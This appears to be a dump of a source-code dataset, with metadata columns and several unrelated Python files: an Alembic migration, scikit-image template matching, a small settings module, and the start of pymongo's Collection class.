hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ef5ab39f15ba19cf26d154d97b1439d120a1ea77 | 1,027 | py | Python | migrations/versions/2289e585ec7b_.py | apoorvkhare07/SUMSarizer | ff8264906c380b4d5e6a52a23040bb8bff361c92 | [
"MIT"
] | 9 | 2015-03-08T07:45:30.000Z | 2019-02-10T04:22:34.000Z | migrations/versions/2289e585ec7b_.py | apoorvkhare07/SUMSarizer | ff8264906c380b4d5e6a52a23040bb8bff361c92 | [
"MIT"
] | 45 | 2015-04-09T00:32:09.000Z | 2018-08-22T18:04:53.000Z | migrations/versions/2289e585ec7b_.py | apoorvkhare07/SUMSarizer | ff8264906c380b4d5e6a52a23040bb8bff361c92 | [
"MIT"
] | 13 | 2015-04-08T23:52:05.000Z | 2019-02-20T10:22:33.000Z | """empty message
Revision ID: 2289e585ec7b
Revises: 4291771faa57
Create Date: 2016-02-29 01:54:50.285413
"""
# revision identifiers, used by Alembic.
revision = '2289e585ec7b'
down_revision = '4291771faa57'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('sz_job',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('study_id', sa.Integer(), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('state', sa.String(length=64), nullable=True),
sa.ForeignKeyConstraint(['study_id'], ['studies.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_sz_job_study_id'), 'sz_job', ['study_id'], unique=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_sz_job_study_id'), table_name='sz_job')
op.drop_table('sz_job')
### end Alembic commands ###
| 28.527778 | 85 | 0.682571 |
f4594662999339f01695fc3e95b0497e5787ca09 | 292 | py | Python | python/katana/local/_graph_numba.py | bobdc/katana | 44b85645ef3955dc10653f64779bfec4231f215c | [
"BSD-3-Clause"
] | 1 | 2022-03-17T11:55:26.000Z | 2022-03-17T11:55:26.000Z | python/katana/local/_graph_numba.py | bobdc/katana | 44b85645ef3955dc10653f64779bfec4231f215c | [
"BSD-3-Clause"
] | null | null | null | python/katana/local/_graph_numba.py | bobdc/katana | 44b85645ef3955dc10653f64779bfec4231f215c | [
"BSD-3-Clause"
] | null | null | null | from numba.extending import overload, overload_method
from katana.local_native import Graph
__all__ = []
@overload_method(Graph._numba_type_wrapper.Type, "node_ids")
def overload_Graph_nodes(self):
_ = self
def impl(self):
return range(self.num_nodes())
return impl
| 18.25 | 60 | 0.736301 |
ad1635c37d775cccf4d3148e12524b788dbeb79e | 6,553 | py | Python | skimage/feature/template.py | zhanwenchen/scikit-image | af8a78e5b12ebb5709a57f9350b4b1f4c8f0c7db | [
"BSD-3-Clause"
] | 3 | 2019-02-28T16:05:36.000Z | 2020-04-03T17:29:07.000Z | Lib/site-packages/skimage/feature/template.py | caiyongji/Anaconda-py36.5-tensorflow-built-env | f4eb40b5ca3f49dfc929ff3ad2b4bb877e9663e2 | [
"PSF-2.0"
] | 26 | 2020-03-24T18:07:06.000Z | 2022-03-12T00:12:27.000Z | Lib/site-packages/skimage/feature/template.py | caiyongji/Anaconda-py36.5-tensorflow-built-env | f4eb40b5ca3f49dfc929ff3ad2b4bb877e9663e2 | [
"PSF-2.0"
] | 3 | 2019-12-31T23:21:40.000Z | 2020-04-03T17:29:08.000Z | import numpy as np
from scipy.signal import fftconvolve
from .._shared.utils import assert_nD
def _window_sum_2d(image, window_shape):
window_sum = np.cumsum(image, axis=0)
window_sum = (window_sum[window_shape[0]:-1]
- window_sum[:-window_shape[0] - 1])
window_sum = np.cumsum(window_sum, axis=1)
window_sum = (window_sum[:, window_shape[1]:-1]
- window_sum[:, :-window_shape[1] - 1])
return window_sum
def _window_sum_3d(image, window_shape):
window_sum = _window_sum_2d(image, window_shape)
window_sum = np.cumsum(window_sum, axis=2)
window_sum = (window_sum[:, :, window_shape[2]:-1]
- window_sum[:, :, :-window_shape[2] - 1])
return window_sum
def match_template(image, template, pad_input=False, mode='constant',
constant_values=0):
"""Match a template to a 2-D or 3-D image using normalized correlation.
The output is an array with values between -1.0 and 1.0. The value at a
given position corresponds to the correlation coefficient between the image
and the template.
For `pad_input=True` matches correspond to the center and otherwise to the
top-left corner of the template. To find the best match you must search for
peaks in the response (output) image.
Parameters
----------
image : (M, N[, D]) array
2-D or 3-D input image.
template : (m, n[, d]) array
Template to locate. It must be `(m <= M, n <= N[, d <= D])`.
pad_input : bool
If True, pad `image` so that output is the same size as the image, and
output values correspond to the template center. Otherwise, the output
is an array with shape `(M - m + 1, N - n + 1)` for an `(M, N)` image
and an `(m, n)` template, and matches correspond to origin
(top-left corner) of the template.
mode : see `numpy.pad`, optional
Padding mode.
constant_values : see `numpy.pad`, optional
Constant values used in conjunction with ``mode='constant'``.
Returns
-------
output : array
Response image with correlation coefficients.
Notes
-----
Details on the cross-correlation are presented in [1]_. This implementation
uses FFT convolutions of the image and the template. Reference [2]_
presents similar derivations but the approximation presented in this
reference is not used in our implementation.
References
----------
.. [1] J. P. Lewis, "Fast Normalized Cross-Correlation", Industrial Light
and Magic.
.. [2] Briechle and Hanebeck, "Template Matching using Fast Normalized
Cross Correlation", Proceedings of the SPIE (2001).
:DOI:`10.1117/12.421129`
Examples
--------
>>> template = np.zeros((3, 3))
>>> template[1, 1] = 1
>>> template
array([[ 0., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 0.]])
>>> image = np.zeros((6, 6))
>>> image[1, 1] = 1
>>> image[4, 4] = -1
>>> image
array([[ 0., 0., 0., 0., 0., 0.],
[ 0., 1., 0., 0., 0., 0.],
[ 0., 0., 0., 0., 0., 0.],
[ 0., 0., 0., 0., 0., 0.],
[ 0., 0., 0., 0., -1., 0.],
[ 0., 0., 0., 0., 0., 0.]])
>>> result = match_template(image, template)
>>> np.round(result, 3)
array([[ 1. , -0.125, 0. , 0. ],
[-0.125, -0.125, 0. , 0. ],
[ 0. , 0. , 0.125, 0.125],
[ 0. , 0. , 0.125, -1. ]])
>>> result = match_template(image, template, pad_input=True)
>>> np.round(result, 3)
array([[-0.125, -0.125, -0.125, 0. , 0. , 0. ],
[-0.125, 1. , -0.125, 0. , 0. , 0. ],
[-0.125, -0.125, -0.125, 0. , 0. , 0. ],
[ 0. , 0. , 0. , 0.125, 0.125, 0.125],
[ 0. , 0. , 0. , 0.125, -1. , 0.125],
[ 0. , 0. , 0. , 0.125, 0.125, 0.125]])
"""
assert_nD(image, (2, 3))
if image.ndim < template.ndim:
raise ValueError("Dimensionality of template must be less than or "
"equal to the dimensionality of image.")
if np.any(np.less(image.shape, template.shape)):
raise ValueError("Image must be larger than template.")
image_shape = image.shape
image = np.array(image, dtype=np.float64, copy=False)
pad_width = tuple((width, width) for width in template.shape)
if mode == 'constant':
image = np.pad(image, pad_width=pad_width, mode=mode,
constant_values=constant_values)
else:
image = np.pad(image, pad_width=pad_width, mode=mode)
# Use special case for 2-D images for much better performance in
# computation of integral images
if image.ndim == 2:
image_window_sum = _window_sum_2d(image, template.shape)
image_window_sum2 = _window_sum_2d(image ** 2, template.shape)
elif image.ndim == 3:
image_window_sum = _window_sum_3d(image, template.shape)
image_window_sum2 = _window_sum_3d(image ** 2, template.shape)
template_mean = template.mean()
template_volume = np.prod(template.shape)
template_ssd = np.sum((template - template_mean) ** 2)
if image.ndim == 2:
xcorr = fftconvolve(image, template[::-1, ::-1],
mode="valid")[1:-1, 1:-1]
elif image.ndim == 3:
xcorr = fftconvolve(image, template[::-1, ::-1, ::-1],
mode="valid")[1:-1, 1:-1, 1:-1]
numerator = xcorr - image_window_sum * template_mean
denominator = image_window_sum2
np.multiply(image_window_sum, image_window_sum, out=image_window_sum)
np.divide(image_window_sum, template_volume, out=image_window_sum)
denominator -= image_window_sum
denominator *= template_ssd
np.maximum(denominator, 0, out=denominator) # sqrt of negative number not allowed
np.sqrt(denominator, out=denominator)
response = np.zeros_like(xcorr, dtype=np.float64)
# avoid zero-division
mask = denominator > np.finfo(np.float64).eps
response[mask] = numerator[mask] / denominator[mask]
slices = []
for i in range(template.ndim):
if pad_input:
d0 = (template.shape[i] - 1) // 2
d1 = d0 + image_shape[i]
else:
d0 = template.shape[i] - 1
d1 = d0 + image_shape[i] - template.shape[i] + 1
slices.append(slice(d0, d1))
return response[tuple(slices)]
| 36.405556 | 86 | 0.572104 |
836c1fc83c17b339ee262c5a02603390e4873e85 | 479 | py | Python | malcolm/modules/pmac/parts/pmacrunnablechildpart.py | MattTaylorDLS/pymalcolm | 995a8e4729bd745f8f617969111cc5a34ce1ac14 | [
"Apache-2.0"
] | null | null | null | malcolm/modules/pmac/parts/pmacrunnablechildpart.py | MattTaylorDLS/pymalcolm | 995a8e4729bd745f8f617969111cc5a34ce1ac14 | [
"Apache-2.0"
] | null | null | null | malcolm/modules/pmac/parts/pmacrunnablechildpart.py | MattTaylorDLS/pymalcolm | 995a8e4729bd745f8f617969111cc5a34ce1ac14 | [
"Apache-2.0"
] | null | null | null | from malcolm.modules.scanning.controllers import RunnableController
from malcolm.modules.scanning.parts import RunnableChildPart
class PmacRunnableChildPart(RunnableChildPart):
# TODO: not sure if this is still needed to reset triggers on pause?
# Think it probably is because we need to reset triggers before rearming
# detectors
@RunnableController.Pause
def pause(self, context):
child = context.block_view(self.params.mri)
child.pause()
| 36.846154 | 76 | 0.762004 |
ed895d59a38557f542237ab3b2b97220cba1300d | 158 | py | Python | ofstest/ofs/doctype/credit_and_sales_transactions/test_credit_and_sales_transactions.py | keithyang77/ofstest | aed4c8d22ea1f7857d6e6fcf774ec36d26a5ed17 | [
"MIT"
] | null | null | null | ofstest/ofs/doctype/credit_and_sales_transactions/test_credit_and_sales_transactions.py | keithyang77/ofstest | aed4c8d22ea1f7857d6e6fcf774ec36d26a5ed17 | [
"MIT"
] | null | null | null | ofstest/ofs/doctype/credit_and_sales_transactions/test_credit_and_sales_transactions.py | keithyang77/ofstest | aed4c8d22ea1f7857d6e6fcf774ec36d26a5ed17 | [
"MIT"
] | null | null | null | # Copyright (c) 2021, mds and Contributors
# See license.txt
# import frappe
import unittest
class TestCreditandSalesTransactions(unittest.TestCase):
pass
| 17.555556 | 56 | 0.797468 |
c826274fe8993fbbf60897a372c7ee592cc592cd | 350 | py | Python | app/settings.py | mgajewskik/website_scraper_api | 7dab20863ac8461f24cff79f36e39d3ad2b40ed0 | [
"MIT"
] | null | null | null | app/settings.py | mgajewskik/website_scraper_api | 7dab20863ac8461f24cff79f36e39d3ad2b40ed0 | [
"MIT"
] | null | null | null | app/settings.py | mgajewskik/website_scraper_api | 7dab20863ac8461f24cff79f36e39d3ad2b40ed0 | [
"MIT"
] | null | null | null | import os
DATA_PATH = os.getenv("DATA_PATH")
PG = {
"host": os.getenv("POSTGRES_NAME"),
"db": os.getenv("PG_DATABASE"),
"user": os.getenv("PG_USER"),
"password": os.getenv("PG_PASSWORD"),
"port": os.getenv("PG_PORT"),
}
POSTGRES_URL = (
f"postgresql://{PG['user']}:{PG['password']}@{PG['host']}:{PG['port']}/{PG['db']}"
)
| 20.588235 | 86 | 0.577143 |
2d233472d179414bd09210b47455df56671dc57e | 75 | py | Python | machine_learning/similarity/problem/__init__.py | caserwin/daily-learning-python | 01fea4c5d4e86cbea2dbef8817146f018b5f1479 | [
"Apache-2.0"
] | 1 | 2019-05-04T07:27:18.000Z | 2019-05-04T07:27:18.000Z | machine_learning/similarity/problem/__init__.py | caserwin/daily-learning-python | 01fea4c5d4e86cbea2dbef8817146f018b5f1479 | [
"Apache-2.0"
] | null | null | null | machine_learning/similarity/problem/__init__.py | caserwin/daily-learning-python | 01fea4c5d4e86cbea2dbef8817146f018b5f1479 | [
"Apache-2.0"
] | 1 | 2018-09-20T01:49:36.000Z | 2018-09-20T01:49:36.000Z | # -*- coding: utf-8 -*-
# @Time : 2019/1/24 上午10:09
# @Author : yidxue
| 18.75 | 30 | 0.52 |
24cb410aa9bd5f21bee0b5d9edad3aaa4c783db5 | 100,801 | py | Python | ADMIN/venv/lib/python2.7/site-packages/pymongo/collection.py | PayPal-Opportunity-Hack-Chennai-2016/surabi-trust | 7f0d2038d5152c8cccb8d9db90b3edc589c3e3d1 | [
"Apache-2.0"
] | 1 | 2016-10-09T01:36:54.000Z | 2016-10-09T01:36:54.000Z | django_project/env/lib/python2.7/site-packages/pymongo/collection.py | bocaaust/FreshLife | 8a4efd9397e5e316f97abacaa765f3d4f9a7b371 | [
"Apache-2.0"
] | 7 | 2016-11-12T11:20:25.000Z | 2022-03-11T23:11:53.000Z | django_project/env/lib/python2.7/site-packages/pymongo/collection.py | bocaaust/FreshLife | 8a4efd9397e5e316f97abacaa765f3d4f9a7b371 | [
"Apache-2.0"
] | 3 | 2016-11-12T09:21:38.000Z | 2016-11-14T14:00:31.000Z | # Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection level utilities for Mongo."""
import collections
import datetime
import warnings
from bson.code import Code
from bson.objectid import ObjectId
from bson.py3compat import (_unicode,
integer_types,
string_type)
from bson.raw_bson import RawBSONDocument
from bson.codec_options import CodecOptions
from bson.son import SON
from pymongo import (common,
helpers,
message)
from pymongo.bulk import BulkOperationBuilder, _Bulk
from pymongo.command_cursor import CommandCursor
from pymongo.cursor import Cursor
from pymongo.errors import ConfigurationError, InvalidName, OperationFailure
from pymongo.helpers import _check_write_command_response
from pymongo.operations import _WriteOp, IndexModel
from pymongo.read_concern import DEFAULT_READ_CONCERN
from pymongo.read_preferences import ReadPreference
from pymongo.results import (BulkWriteResult,
DeleteResult,
InsertOneResult,
InsertManyResult,
UpdateResult)
from pymongo.write_concern import WriteConcern
try:
from collections import OrderedDict
_ORDERED_TYPES = (SON, OrderedDict)
except ImportError:
_ORDERED_TYPES = (SON,)
_NO_OBJ_ERROR = "No matching object found"
_UJOIN = u"%s.%s"
class ReturnDocument(object):
"""An enum used with
:meth:`~pymongo.collection.Collection.find_one_and_replace` and
:meth:`~pymongo.collection.Collection.find_one_and_update`.
"""
BEFORE = False
"""Return the original document before it was updated/replaced, or
``None`` if no document matches the query.
"""
AFTER = True
"""Return the updated/replaced or inserted document."""
class Collection(common.BaseObject):
"""A Mongo collection.
"""
def __init__(self, database, name, create=False, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
**kwargs):
"""Get / create a Mongo collection.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
collection name. Any additional keyword arguments will be used
as options passed to the create command. See
:meth:`~pymongo.database.Database.create_collection` for valid
options.
If `create` is ``True`` or additional keyword arguments are
present a create command will be sent. Otherwise, a create
command will not be sent and the collection will be created
implicitly on first use.
:Parameters:
- `database`: the database to get a collection from
- `name`: the name of the collection to get
- `create` (optional): if ``True``, force collection
creation even without options being set
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) database.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) database.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) database.write_concern is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) database.read_concern is used.
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.2
Added the read_concern option.
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
Removed the uuid_subtype attribute.
:class:`~pymongo.collection.Collection` no longer returns an
instance of :class:`~pymongo.collection.Collection` for attribute
names with leading underscores. You must use dict-style lookups
instead::
collection['__my_collection__']
Not:
collection.__my_collection__
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionadded:: 2.1
uuid_subtype attribute
.. mongodoc:: collections
"""
super(Collection, self).__init__(
codec_options or database.codec_options,
read_preference or database.read_preference,
write_concern or database.write_concern,
read_concern or database.read_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if not name or ".." in name:
raise InvalidName("collection names cannot be empty")
if "$" in name and not (name.startswith("oplog.$main") or
name.startswith("$cmd")):
raise InvalidName("collection names must not "
"contain '$': %r" % name)
if name[0] == "." or name[-1] == ".":
raise InvalidName("collection names must not start "
"or end with '.': %r" % name)
if "\x00" in name:
raise InvalidName("collection names must not contain the "
"null character")
self.__database = database
self.__name = _unicode(name)
self.__full_name = _UJOIN % (self.__database.name, self.__name)
if create or kwargs:
self.__create(kwargs)
self.__write_response_codec_options = self.codec_options._replace(
unicode_decode_error_handler='replace',
document_class=dict)
def _socket_for_reads(self):
return self.__database.client._socket_for_reads(self.read_preference)
def _socket_for_primary_reads(self):
return self.__database.client._socket_for_reads(ReadPreference.PRIMARY)
def _socket_for_writes(self):
return self.__database.client._socket_for_writes()
def _command(self, sock_info, command, slave_ok=False,
read_preference=None,
codec_options=None, check=True, allowable_errors=None,
read_concern=DEFAULT_READ_CONCERN):
"""Internal command helper.
:Parameters:
- `sock_info` - A SocketInfo instance.
- `command` - The command itself, as a SON instance.
- `slave_ok`: whether to set the SlaveOkay wire protocol bit.
- `codec_options` (optional) - An instance of
:class:`~bson.codec_options.CodecOptions`.
- `check`: raise OperationFailure if there are errors
- `allowable_errors`: errors to ignore if `check` is True
- `read_concern` (optional) - An instance of
:class:`~pymongo.read_concern.ReadConcern`.
:Returns:
# todo: don't return address
(result document, address of server the command was run on)
"""
return sock_info.command(self.__database.name,
command,
slave_ok,
read_preference or self.read_preference,
codec_options or self.codec_options,
check,
allowable_errors,
read_concern=read_concern)
def __create(self, options):
"""Sends a create command with the given options.
"""
cmd = SON([("create", self.__name)])
if options:
if "size" in options:
options["size"] = float(options["size"])
cmd.update(options)
with self._socket_for_writes() as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY)
def __getattr__(self, name):
"""Get a sub-collection of this collection by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
full_name = _UJOIN % (self.__name, name)
raise AttributeError(
"Collection has no attribute %r. To access the %s"
" collection, use database['%s']." % (
name, full_name, full_name))
return self.__getitem__(name)
def __getitem__(self, name):
return Collection(self.__database, _UJOIN % (self.__name, name))
def __repr__(self):
return "Collection(%r, %r)" % (self.__database, self.__name)
def __eq__(self, other):
if isinstance(other, Collection):
return (self.__database == other.database and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
@property
def full_name(self):
"""The full name of this :class:`Collection`.
The full name is of the form `database_name.collection_name`.
"""
return self.__full_name
@property
def name(self):
"""The name of this :class:`Collection`."""
return self.__name
@property
def database(self):
"""The :class:`~pymongo.database.Database` that this
:class:`Collection` is a part of.
"""
return self.__database
def with_options(
self, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a clone of this collection changing the specified settings.
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY)
>>> coll1.read_preference
Primary()
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Collection`
is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Collection` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Collection`
is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`Collection`
is used.
"""
return Collection(self.__database,
self.__name,
False,
codec_options or self.codec_options,
read_preference or self.read_preference,
write_concern or self.write_concern,
read_concern or self.read_concern)
def initialize_unordered_bulk_op(self, bypass_document_validation=False):
"""Initialize an unordered batch of write operations.
Operations will be performed on the server in arbitrary order,
possibly in parallel. All operations will be attempted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`unordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
return BulkOperationBuilder(self, False, bypass_document_validation)
def initialize_ordered_bulk_op(self, bypass_document_validation=False):
"""Initialize an ordered batch of write operations.
Operations will be performed on the server serially, in the
order provided. If an error occurs all remaining operations
are aborted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`ordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
return BulkOperationBuilder(self, True, bypass_document_validation)
def bulk_write(self, requests, ordered=True,
bypass_document_validation=False):
"""Send a batch of write operations to the server.
Requests are passed as a list of write operation instances (
:class:`~pymongo.operations.InsertOne`,
:class:`~pymongo.operations.UpdateOne`,
:class:`~pymongo.operations.UpdateMany`,
:class:`~pymongo.operations.ReplaceOne`,
:class:`~pymongo.operations.DeleteOne`, or
:class:`~pymongo.operations.DeleteMany`).
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')}
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
>>> # DeleteMany, UpdateOne, and UpdateMany are also available.
...
>>> from pymongo import InsertOne, DeleteOne, ReplaceOne
>>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}),
... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)]
>>> result = db.test.bulk_write(requests)
>>> result.inserted_count
1
>>> result.deleted_count
1
>>> result.modified_count
0
>>> result.upserted_ids
{2: ObjectId('54f62ee28891e756a6e1abd5')}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
{u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')}
{u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')}
:Parameters:
- `requests`: A list of write operations (see examples above).
- `ordered` (optional): If ``True`` (the default) requests will be
performed on the server serially, in the order provided. If an error
occurs all remaining operations are aborted. If ``False`` requests
will be performed on the server in arbitrary order, possibly in
parallel, and all operations will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
An instance of :class:`~pymongo.results.BulkWriteResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(requests, list):
raise TypeError("requests must be a list")
blk = _Bulk(self, ordered, bypass_document_validation)
for request in requests:
if not isinstance(request, _WriteOp):
raise TypeError("%r is not a valid request" % (request,))
request._add_to_bulk(blk)
bulk_api_result = blk.execute(self.write_concern.document)
if bulk_api_result is not None:
return BulkWriteResult(bulk_api_result, True)
return BulkWriteResult({}, False)
def _legacy_write(self, sock_info, name, cmd, acknowledged, op_id,
bypass_doc_val, func, *args):
"""Internal legacy write helper."""
# Cannot have both unacknowledged write and bypass document validation.
if (bypass_doc_val and not acknowledged and
sock_info.max_wire_version >= 4):
raise OperationFailure("Cannot set bypass_document_validation with"
" unacknowledged write concern")
listeners = self.database.client._event_listeners
publish = listeners.enabled_for_commands
if publish:
start = datetime.datetime.now()
rqst_id, msg, max_size = func(*args)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
cmd, self.__database.name, rqst_id, sock_info.address, op_id)
start = datetime.datetime.now()
try:
result = sock_info.legacy_write(
rqst_id, msg, max_size, acknowledged)
except Exception as exc:
if publish:
dur = (datetime.datetime.now() - start) + duration
if isinstance(exc, OperationFailure):
details = exc.details
# Succeed if GLE was successful and this is a write error.
if details.get("ok") and "n" in details:
reply = message._convert_write_result(
name, cmd, details)
listeners.publish_command_success(
dur, reply, name, rqst_id, sock_info.address, op_id)
raise
else:
details = message._convert_exception(exc)
listeners.publish_command_failure(
dur, details, name, rqst_id, sock_info.address, op_id)
raise
if publish:
if result is not None:
reply = message._convert_write_result(name, cmd, result)
else:
# Comply with APM spec.
reply = {'ok': 1}
duration = (datetime.datetime.now() - start) + duration
listeners.publish_command_success(
duration, reply, name, rqst_id, sock_info.address, op_id)
return result
def _insert_one(
self, sock_info, doc, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val):
"""Internal helper for inserting a single document."""
if manipulate:
doc = self.__database._apply_incoming_manipulators(doc, self)
if not isinstance(doc, RawBSONDocument) and '_id' not in doc:
doc['_id'] = ObjectId()
doc = self.__database._apply_incoming_copying_manipulators(doc,
self)
concern = (write_concern or self.write_concern).document
acknowledged = concern.get("w") != 0
command = SON([('insert', self.name),
('ordered', ordered),
('documents', [doc])])
if concern:
command['writeConcern'] = concern
if sock_info.max_wire_version > 1 and acknowledged:
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# Insert command.
result = sock_info.command(
self.__database.name,
command,
codec_options=self.__write_response_codec_options,
check_keys=check_keys)
_check_write_command_response([(0, result)])
else:
# Legacy OP_INSERT.
self._legacy_write(
sock_info, 'insert', command, acknowledged, op_id,
bypass_doc_val, message.insert, self.__full_name, [doc],
check_keys, acknowledged, concern, False,
self.__write_response_codec_options)
if not isinstance(doc, RawBSONDocument):
return doc.get('_id')
def _insert(self, sock_info, docs, ordered=True, check_keys=True,
manipulate=False, write_concern=None, op_id=None,
bypass_doc_val=False):
"""Internal insert helper."""
if isinstance(docs, collections.Mapping):
return self._insert_one(
sock_info, docs, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val)
ids = []
if manipulate:
def gen():
"""Generator that applies SON manipulators to each document
and adds _id if necessary.
"""
_db = self.__database
for doc in docs:
# Apply user-configured SON manipulators. This order of
# operations is required for backwards compatibility,
# see PYTHON-709.
doc = _db._apply_incoming_manipulators(doc, self)
if not (isinstance(doc, RawBSONDocument) or '_id' in doc):
doc['_id'] = ObjectId()
doc = _db._apply_incoming_copying_manipulators(doc, self)
ids.append(doc['_id'])
yield doc
else:
def gen():
"""Generator that only tracks existing _ids."""
for doc in docs:
# Don't inflate RawBSONDocument by touching fields.
if not isinstance(doc, RawBSONDocument):
ids.append(doc.get('_id'))
yield doc
concern = (write_concern or self.write_concern).document
acknowledged = concern.get("w") != 0
command = SON([('insert', self.name),
('ordered', ordered)])
if concern:
command['writeConcern'] = concern
if op_id is None:
op_id = message._randint()
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
bwc = message._BulkWriteContext(
self.database.name, command, sock_info, op_id,
self.database.client._event_listeners)
if sock_info.max_wire_version > 1 and acknowledged:
# Batched insert command.
results = message._do_batched_write_command(
self.database.name + ".$cmd", message._INSERT, command,
gen(), check_keys, self.__write_response_codec_options, bwc)
_check_write_command_response(results)
else:
# Legacy batched OP_INSERT.
message._do_batched_insert(self.__full_name, gen(), check_keys,
acknowledged, concern, not ordered,
self.__write_response_codec_options, bwc)
return ids
def insert_one(self, document, bypass_document_validation=False):
"""Insert a single document.
>>> db.test.count({'x': 1})
0
>>> result = db.test.insert_one({'x': 1})
>>> result.inserted_id
ObjectId('54f112defba522406c9cc208')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')}
:Parameters:
- `document`: The document to insert. Must be a mutable mapping
type. If the document does not have an _id field one will be
added automatically.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
- An instance of :class:`~pymongo.results.InsertOneResult`.
.. seealso:: :ref:`writes-and-ids`
